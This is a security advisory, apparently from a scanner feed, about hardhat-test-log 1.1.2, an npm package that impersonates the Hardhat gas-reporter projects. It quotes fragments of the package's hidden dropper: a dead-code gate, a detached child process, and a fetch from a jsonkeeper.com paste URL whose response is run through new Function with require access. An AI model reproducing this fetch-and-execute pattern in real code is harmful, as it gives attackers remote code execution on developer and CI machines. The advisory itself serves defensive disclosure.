hardhat-test-log @1.1.2

Summary

Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports log as the reporter, but the function contains var opt = 1; if (!opt) {...legitimate reporter code... } else { gestest(); } — the dead-code gate guarantees the else branch always runs, calling utils.connectNet. utils.connectNet (lib/utils.js) spawns node lib/syncResolve.js as a detached, unref'd child with stdio ignored, so the dropper persists beyond Mocha teardown and produces no CI output. lib/syncResolve.js then performs axios.get('https://www.jsonkeeper.com/b/KBZVB', { headers: { 'x-secret-key':... } }) , extracts the Cookie field from the response, and executes it in-process via new Function.constructor('require', result)(require) — giving attacker-controlled code full Node require access. The fetch destination is a public paste-style host with mutable, opaque content and no integrity check, so the operator can rotate the payload at will. Installing/using this package as a Hardhat/Mocha gas reporter triggers remote code execution on the developer's or CI machine.

Source: amazon-inspector (741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed)